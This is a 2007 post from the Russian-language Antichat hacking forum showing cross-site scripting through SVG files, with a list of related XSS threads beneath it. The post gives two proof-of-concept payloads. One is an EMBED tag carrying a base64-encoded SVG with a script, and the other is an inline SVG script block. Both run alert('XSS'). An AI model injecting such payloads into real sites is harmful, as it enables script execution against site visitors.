Форум АНТИЧАТ - XSS in Scalable Vector Graphics(SVG)

XSS in Scalable Vector Graphics(SVG)

19.02.2007, 18:20

ettee

Administrator

Регистрация: 12.10.2006

Сообщений: 466

Провел на форуме:
17234747

Репутация: 5170

XSS in Scalable Vector Graphics(SVG)

Формат является открытым стандартом, который основан на языке XML, SVG формат объединяет в себе графические данные, текст и интерактивные компоненты. Подержка браузеров и производителей графического ПО.
Cайте формата http://www.w3.org/Graphics/SVG
thx nEUrOO за первую демонстрацию.

Код:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Код:

<svg
...

<script>
   <![CDATA[
	alert("XSS");
   ]]>
  </script>
</svg>

Пример

Последний раз редактировалось ettee; 29.07.2008 в 20:51..

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Энциклопедия уязвимых скриптов

DIAgen

Сценарии/CMF/СMS

401

17.06.2010 17:39

Xss: Cегодня и вчера. Опрос

Constantine

Болталка

07.12.2009 08:57

IE XSS Kit

.Slip

Чаты

23.10.2006 06:45

XSS worms

Xex

Статьи

02.10.2006 01:49

Xss для новичков

Micr0b

Уязвимости

04.06.2006 18:25